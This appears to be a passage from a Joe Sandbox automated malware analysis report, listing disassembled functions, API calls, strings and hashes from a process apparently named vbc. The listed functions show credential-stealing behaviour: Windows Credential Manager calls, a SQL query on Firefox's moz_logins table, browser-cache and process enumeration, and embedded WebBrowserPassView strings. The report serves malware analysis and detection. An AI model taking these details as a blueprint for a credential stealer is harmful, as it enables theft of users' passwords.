                                                              • Instruction Fuzzy Hash: 7101DE72ACA31138F83851672D17F971A598FA1B7AF70196FF514D81C6EEAC9000709D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,0040F928), ref: 00410CE8
                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00410D01
                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00410D12
                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00410D23
                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00410D34
                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00410D45
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                              • API String ID: 667068680-3953557276
                                                              • Opcode ID: 620f7fb1875e6c1fe369c72aee23538108181ed26fa9b0cca4b6b71503556dd6
                                                              • Instruction ID: 16f3a03532fd71bf7b987582fee040d1dd7fa58dea07b6b8c7b27d1037cf047a
                                                              • Opcode Fuzzy Hash: 620f7fb1875e6c1fe369c72aee23538108181ed26fa9b0cca4b6b71503556dd6
                                                              • Instruction Fuzzy Hash: 92F0F474605321A9A3108BA8BD00BA72FF86781F52B10013BED00D1266DBBCD8C29F7E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 0040383E: FreeLibrary.KERNEL32(?,004037CB,00000000,00408635,?,00000000,?), ref: 00403845
                                                              • LoadLibraryW.KERNEL32(advapi32.dll,00000000,00408635,?,00000000,?), ref: 004037D0
                                                              • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004037E9
                                                              • GetProcAddress.KERNEL32(?,CredFree), ref: 004037F5
                                                              • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403801
                                                              • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040380D
                                                              • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403819
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$Library$FreeLoad
                                                              • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                              • API String ID: 2449869053-4258758744
                                                              • Opcode ID: cb87cb7b44b35881c8e04de2777173e0b76236c73d0c14512c4dcac4629ff988
                                                              • Instruction ID: c94656deef6b20b6b745ef32668947add9de3545ed3fb2bb9f52e7e7eb3e89f2
                                                              • Opcode Fuzzy Hash: cb87cb7b44b35881c8e04de2777173e0b76236c73d0c14512c4dcac4629ff988
                                                              • Instruction Fuzzy Hash: D9012C355007809AD730AF6AC809F06BEE4EF54B02B21886FF091A3791D7B9E240CF48
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryW.KERNEL32(psapi.dll,00000000,0041137E,00000000,0041126B,00000000,?), ref: 004113A9
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004113BD
                                                              • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 004113C9
                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 004113D5
                                                              • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 004113E1
                                                              • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 004113ED
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                              • API String ID: 2238633743-70141382
                                                              • Opcode ID: 7d64db311815f5693af3cb75c4746d4d82b2a24bf7d3ef9ccff621f71f8c2f2c
                                                              • Instruction ID: b0fa25657284a8e9196716ee499a251a0e3e908d4b843c37df8f242eb1d66817
                                                              • Opcode Fuzzy Hash: 7d64db311815f5693af3cb75c4746d4d82b2a24bf7d3ef9ccff621f71f8c2f2c
                                                              • Instruction Fuzzy Hash: A3F03478988704AEEB30AF75DC08E07BEF0EFA8B11721892EE0C593650D7799441EF58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                                • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                              • memset.MSVCRT ref: 00403415
                                                              • memset.MSVCRT ref: 0040342A
                                                              • memset.MSVCRT ref: 0040343F
                                                              • _snwprintf.MSVCRT ref: 00403467
                                                              • wcscpy.MSVCRT ref: 00403483
                                                              • _snwprintf.MSVCRT ref: 004034C6
                                                              Strings
                                                              • WebBrowserPassView, xrefs: 004034AB
                                                              • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 0040345A
                                                              • <table dir="rtl"><tr><td>, xrefs: 0040347D
                                                              • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004034B9
                                                              • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004033EF
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$_snwprintf$FileWritewcscpywcslen
                                                              • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$WebBrowserPassView
                                                              • API String ID: 2731979376-1376879643
                                                              • Opcode ID: f8e001787c2363cba2026e3d3c8ba2c251a00b45d532011988efd28241eb9acd
                                                              • Instruction ID: ae32d01ec2d3a7685ec326ba9a70c170c8059c8ae6e66fa8bd15e07dd33865c2
                                                              • Opcode Fuzzy Hash: f8e001787c2363cba2026e3d3c8ba2c251a00b45d532011988efd28241eb9acd
                                                              • Instruction Fuzzy Hash: 2E217672D002187ADB21AF55DC41FEA76BCEB08785F0040AFF509A6191DA799F848F69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                              • String ID:
                                                              • API String ID: 2827331108-0
                                                              • Opcode ID: 2058148763841eb6e814cfbd421e32e46215803419e112ecbbbfb28c93f0ce14
                                                              • Instruction ID: 706d3d187beade5fd8be42c29aa928e65c4a76933a7b40434c1f532ca5c4ff1d
                                                              • Opcode Fuzzy Hash: 2058148763841eb6e814cfbd421e32e46215803419e112ecbbbfb28c93f0ce14
                                                              • Instruction Fuzzy Hash: 1E51C674C00305DFEB21AF64DA44AADB7B4FB05B15FA0422BF811A7291D7B84982CF5C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 004037C3: LoadLibraryW.KERNEL32(advapi32.dll,00000000,00408635,?,00000000,?), ref: 004037D0
                                                                • Part of subcall function 004037C3: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004037E9
                                                                • Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredFree), ref: 004037F5
                                                                • Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403801
                                                                • Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040380D
                                                                • Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403819
                                                              • wcslen.MSVCRT ref: 00408678
                                                              • wcsncmp.MSVCRT(?,?,?,?,00000000,?), ref: 004086AE
                                                              • memset.MSVCRT ref: 00408725
                                                              • memcpy.MSVCRT ref: 00408746
                                                              • _wcsnicmp.MSVCRT ref: 0040878B
                                                              • wcschr.MSVCRT ref: 004087B3
                                                              • LocalFree.KERNEL32(?,?,?,?,?,00000001,?,?,00000000,?), ref: 004087D7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$FreeLibraryLoadLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                              • String ID: J$Microsoft_WinInet$Microsoft_WinInet_
                                                              • API String ID: 2685351942-1864008983
                                                              • Opcode ID: 212f3f294c9ab8b83a3dc136b78cffcc3e5b2f11c9e98eede468f190287508d3
                                                              • Instruction ID: ae9214853af189039b11f9ecdcfbf9e5a6a1e8940f9aa775dff38fc8017bd4cb
                                                              • Opcode Fuzzy Hash: 212f3f294c9ab8b83a3dc136b78cffcc3e5b2f11c9e98eede468f190287508d3
                                                              • Instruction Fuzzy Hash: E45129B5D00209AFDB20DFA4C981A9EB7F8FF08304F14446EE959F7241EB34A945CB19
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetBkMode.GDI32(?,00000001), ref: 0040DE90
                                                              • SetTextColor.GDI32(?,00FF0000), ref: 0040DE9E
                                                              • SelectObject.GDI32(?,?), ref: 0040DEB3
                                                              • DrawTextExW.USER32(?,?,000000FF,?,00000004,?), ref: 0040DEE9
                                                              • SelectObject.GDI32(00000014,00000000), ref: 0040DEF3
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040DF0E
                                                              • LoadCursorW.USER32(00000000,00000067), ref: 0040DF17
                                                              • SetCursor.USER32(00000000), ref: 0040DF1E
                                                              • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 0040DF64
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CursorObjectSelectText$ColorDrawHandleLoadMessageModeModulePost
                                                              • String ID: WebBrowserPassView
                                                              • API String ID: 101102110-2171583229
                                                              • Opcode ID: d30b9dbd8ebc4ebaeb5335cce5274ca5fb8e94d47e078bea0be9f04dbaba8f28
                                                              • Instruction ID: 5844c3f8be721e5f4358c4987d475350c1bb70f51af30b4dfd416207439779ca
                                                              • Opcode Fuzzy Hash: d30b9dbd8ebc4ebaeb5335cce5274ca5fb8e94d47e078bea0be9f04dbaba8f28
                                                              • Instruction Fuzzy Hash: D451D431A00206ABDB10AFA4C845F6AB7A6BF44315F20853AF507B72E0C779AD15DB99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,004094E9,?,?,00409553,00000000), ref: 0040933D
                                                                • Part of subcall function 00407BD1: SetFilePointer.KERNEL32(00409553,?,00000000,00000000,?,0040935E,00000000,00000000,?,00000020,?,004094E9,?,?,00409553,00000000), ref: 00407BDE
                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040936D
                                                                • Part of subcall function 0040928C: _memicmp.MSVCRT ref: 004092A6
                                                                • Part of subcall function 0040928C: memcpy.MSVCRT ref: 004092BD
                                                              • memcpy.MSVCRT ref: 004093B4
                                                              • strchr.MSVCRT ref: 004093D9
                                                              • strchr.MSVCRT ref: 004093EA
                                                              • _strlwr.MSVCRT ref: 004093F8
                                                              • memset.MSVCRT ref: 00409413
                                                              • CloseHandle.KERNEL32(00000000), ref: 00409460
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                              • String ID: 4$h
                                                              • API String ID: 4066021378-1856150674
                                                              • Opcode ID: 5c9b1e76fbe1022800f84db5655dab790c3d9ef423dba09cd133e7d04b6bc347
                                                              • Instruction ID: cde85974a53443ad19b2097b399cb4fe7e1f14935bf37b0ef0624c00476b394c
                                                              • Opcode Fuzzy Hash: 5c9b1e76fbe1022800f84db5655dab790c3d9ef423dba09cd133e7d04b6bc347
                                                              • Instruction Fuzzy Hash: 333186B1900118BEEB11EB54CC85BEE77ACEF04358F10406AFA08E6181D7789F558B69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$_snwprintf
                                                              • String ID: %%0.%df
                                                              • API String ID: 3473751417-763548558
                                                              • Opcode ID: 4b41fd37f03522ed39b57e73efbb1f6ad9b07295744d2b5ffc828d63613b1bc3
                                                              • Instruction ID: 8dc9084977ea8e099579ef4c9ca95b08d60ceca6feee4e1064a0b0e4f5e47a8f
                                                              • Opcode Fuzzy Hash: 4b41fd37f03522ed39b57e73efbb1f6ad9b07295744d2b5ffc828d63613b1bc3
                                                              • Instruction Fuzzy Hash: 79313E71800229BAEB20DF55DC85FEBBBBCFF49308F4000EAB609A2151D7749B94CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • wcschr.MSVCRT ref: 00410E0E
                                                              • wcscpy.MSVCRT ref: 00410E1E
                                                                • Part of subcall function 00407278: wcslen.MSVCRT ref: 00407287
                                                                • Part of subcall function 00407278: wcslen.MSVCRT ref: 00407291
                                                                • Part of subcall function 00407278: _memicmp.MSVCRT ref: 004072AC
                                                              • wcscpy.MSVCRT ref: 00410E6D
                                                              • wcscat.MSVCRT ref: 00410E78
                                                              • memset.MSVCRT ref: 00410E54
                                                                • Part of subcall function 00407723: GetWindowsDirectoryW.KERNEL32(00451698,00000104,?,00410EAD,?,?,00000000,00000208,?), ref: 00407739
                                                                • Part of subcall function 00407723: wcscpy.MSVCRT ref: 00407749
                                                              • memset.MSVCRT ref: 00410E9C
                                                              • memcpy.MSVCRT ref: 00410EB7
                                                              • wcscat.MSVCRT ref: 00410EC3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                              • String ID: \systemroot
                                                              • API String ID: 4173585201-1821301763
                                                              • Opcode ID: a0bd60bd2b0e165453e177ad0a7c90215dc3e7af33d93e9088b0359243bc96d3
                                                              • Instruction ID: 1a8d2db1a324573a28d88b24eeb1ed9c65cf0fc221c6a4ee7099d5d8ca3d40a6
                                                              • Opcode Fuzzy Hash: a0bd60bd2b0e165453e177ad0a7c90215dc3e7af33d93e9088b0359243bc96d3
                                                              • Instruction Fuzzy Hash: B121F9B280530479E621E7628D86EEB63EC9F05754F60455FF119E2082FABCA6C58B1E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00441975: memset.MSVCRT ref: 004419A0
                                                                • Part of subcall function 00441975: wcscpy.MSVCRT ref: 004419B7
                                                                • Part of subcall function 00441975: memset.MSVCRT ref: 004419EA
                                                                • Part of subcall function 00441975: wcscpy.MSVCRT ref: 00441A00
                                                                • Part of subcall function 00441975: wcscat.MSVCRT ref: 00441A11
                                                                • Part of subcall function 00441975: wcscpy.MSVCRT ref: 00441A37
                                                                • Part of subcall function 00441975: wcscat.MSVCRT ref: 00441A48
                                                                • Part of subcall function 00441975: wcscpy.MSVCRT ref: 00441A6F
                                                                • Part of subcall function 00441975: wcscat.MSVCRT ref: 00441A80
                                                                • Part of subcall function 00441975: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441A8F
                                                                • Part of subcall function 00441975: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441AA6
                                                                • Part of subcall function 00441975: GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00441AF3
                                                                • Part of subcall function 00441975: GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00441AFF
                                                              • memset.MSVCRT ref: 004069BD
                                                                • Part of subcall function 00407DC0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,004028DC,?,?,00000003,00000000,00000000), ref: 00407DD9
                                                              • memset.MSVCRT ref: 00406A3C
                                                              • memset.MSVCRT ref: 00406A51
                                                              • strcpy.MSVCRT(?,00000000,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406AC4
                                                              • strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406ADA
                                                              • strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406AF0
                                                              • strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406B06
                                                              • strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406B1C
                                                              • strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406B32
                                                              • memset.MSVCRT ref: 00406B48
                                                              Strings
                                                              • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 00406A03
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memsetstrcpy$wcscpy$wcscat$AddressProc$ByteCharHandleLibraryLoadModuleMultiWide
                                                              • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins
                                                              • API String ID: 2096775815-1740008135
                                                              • Opcode ID: 8192c0fe8ba549a976583856fdff13a2ed89254f8bdc8aa75337d2af27a32240
                                                              • Instruction ID: 0d09ea3875aa138d6f02baa8234f1932a31c53e7e6ecd19b10853a161b4d72d0
                                                              • Opcode Fuzzy Hash: 8192c0fe8ba549a976583856fdff13a2ed89254f8bdc8aa75337d2af27a32240
                                                              • Instruction Fuzzy Hash: 6D61E9B2C0421EEEDF11AF91DC419DEBBB8EF04314F10406BF505B2191EA79AA94CF69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00414BCA: GetVersionExW.KERNEL32(?), ref: 00414BED
                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00415EDB
                                                              • malloc.MSVCRT ref: 00415EE6
                                                              • free.MSVCRT(?), ref: 00415EF6
                                                              • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00415F0A
                                                              • free.MSVCRT(?), ref: 00415F0F
                                                              • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00415F25
                                                              • malloc.MSVCRT ref: 00415F2D
                                                              • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00415F40
                                                              • free.MSVCRT(?), ref: 00415F45
                                                              • free.MSVCRT(?), ref: 00415F59
                                                              • free.MSVCRT(00000000,0044A338,00000000), ref: 00415F78
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: free$FullNamePath$malloc$Version
                                                              • String ID:
                                                              • API String ID: 3356672799-0
                                                              • Opcode ID: a6b4e207406f0fe9805ca5f6465096f20e288da3b12bdf8f0f4f48b39aeac8ca
                                                              • Instruction ID: 788494e2a8c2de429da1840323bde4c0a518de2f45811afbb62912a9d7d550b6
                                                              • Opcode Fuzzy Hash: a6b4e207406f0fe9805ca5f6465096f20e288da3b12bdf8f0f4f48b39aeac8ca
                                                              • Instruction Fuzzy Hash: F321CB71900108FFEB117FA5DD46CDFBBA9DF80368B20007BF404A2160EA785F809568
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • EmptyClipboard.USER32 ref: 0040736D
                                                                • Part of subcall function 00407144: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040738A
                                                              • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040739B
                                                              • GlobalLock.KERNEL32 ref: 004073A8
                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 004073BB
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004073CD
                                                              • SetClipboardData.USER32 ref: 004073D6
                                                              • GetLastError.KERNEL32 ref: 004073DE
                                                              • CloseHandle.KERNEL32(?), ref: 004073EA
                                                              • GetLastError.KERNEL32 ref: 004073F5
                                                              • CloseClipboard.USER32 ref: 004073FE
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                              • String ID:
                                                              • API String ID: 3604893535-0
                                                              • Opcode ID: ff4ef1d92d1a290ea301bbc8eaca8dcb04474945f762c75d88d1861bbfd53786
                                                              • Instruction ID: 70226e125eefff96fe42492f97b8668800667adb6f1e94a7dd2fd5f696112ff0
                                                              • Opcode Fuzzy Hash: ff4ef1d92d1a290ea301bbc8eaca8dcb04474945f762c75d88d1861bbfd53786
                                                              • Instruction Fuzzy Hash: E311423A904204FBE7105FB5EC4DA5E7F78EB06B52F204176FD02E5290DB749A01DB69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: wcscpy
                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                              • API String ID: 1284135714-318151290
                                                              • Opcode ID: 765507c601b4d8d2ba7194c2d8328fe19790b608763020fa3010f04483565392
                                                              • Instruction ID: 454bece2ea24cac32075296694d9d3cbfc4d611bf65854eebe1c10393ee0200f
                                                              • Opcode Fuzzy Hash: 765507c601b4d8d2ba7194c2d8328fe19790b608763020fa3010f04483565392
                                                              • Instruction Fuzzy Hash: 46F01D3329C746A0383D09680B06AFF1001E2127497B585D3A882E06D5C8FDCEF2F81F
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • memset.MSVCRT ref: 0040952C
                                                                • Part of subcall function 004090DF: memset.MSVCRT ref: 00409102
                                                                • Part of subcall function 004090DF: memset.MSVCRT ref: 0040911A
                                                                • Part of subcall function 004090DF: wcslen.MSVCRT ref: 00409136
                                                                • Part of subcall function 004090DF: wcslen.MSVCRT ref: 00409145
                                                                • Part of subcall function 004090DF: wcslen.MSVCRT ref: 0040918C
                                                                • Part of subcall function 004090DF: wcslen.MSVCRT ref: 0040919B
                                                                • Part of subcall function 004085EB: ??2@YAPAXI@Z.MSVCRT ref: 004085F4
                                                              • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 004095A1
                                                              • wcschr.MSVCRT ref: 004095B8
                                                              • wcschr.MSVCRT ref: 004095D8
                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 004095FD
                                                              • GetLastError.KERNEL32 ref: 00409607
                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 00409633
                                                              • FindCloseUrlCache.WININET(?), ref: 00409644
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CacheFindwcslen$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                              • String ID: visited:
                                                              • API String ID: 459061729-1702587658
                                                              • Opcode ID: 5b5501fe5efe3d169eb3816f13414caed7c9bfde6247c14029e06bf94e07ff04
                                                              • Instruction ID: 77a6c5406e07bb2a3f369751b76910ce3bd9900599f044f3c0855e39104cf3e1
                                                              • Opcode Fuzzy Hash: 5b5501fe5efe3d169eb3816f13414caed7c9bfde6247c14029e06bf94e07ff04
                                                              • Instruction Fuzzy Hash: 7F417F72D00219BBDB11DF95CD85A9EBBB8EF05714F10406AE505F7281DB38AF41CBA8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.275776933.0000000000452000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                              • String ID: 0$6
                                                              • API String ID: 4066108131-3849865405
                                                              • Opcode ID: 1d39bbd5ff858052ee02b08f17fe13160222b35be18e4d09e9b30479f4b91e1d
                                                              • Instruction ID: 34000a492db7a65727c4d20bf870b817f1c48c155544aae5e12c30b4e9d7c158
                                                              • Opcode Fuzzy Hash: 1d39bbd5ff858052ee02b08f17fe13160222b35be18e4d09e9b30479f4b91e1d
                                                              • Instruction Fuzzy Hash: 64318B72408340AFDB20DF91D845A9BB7E8FF84354F00497EF948A2291E37ADA14CB5B
                                                              Uniqueness

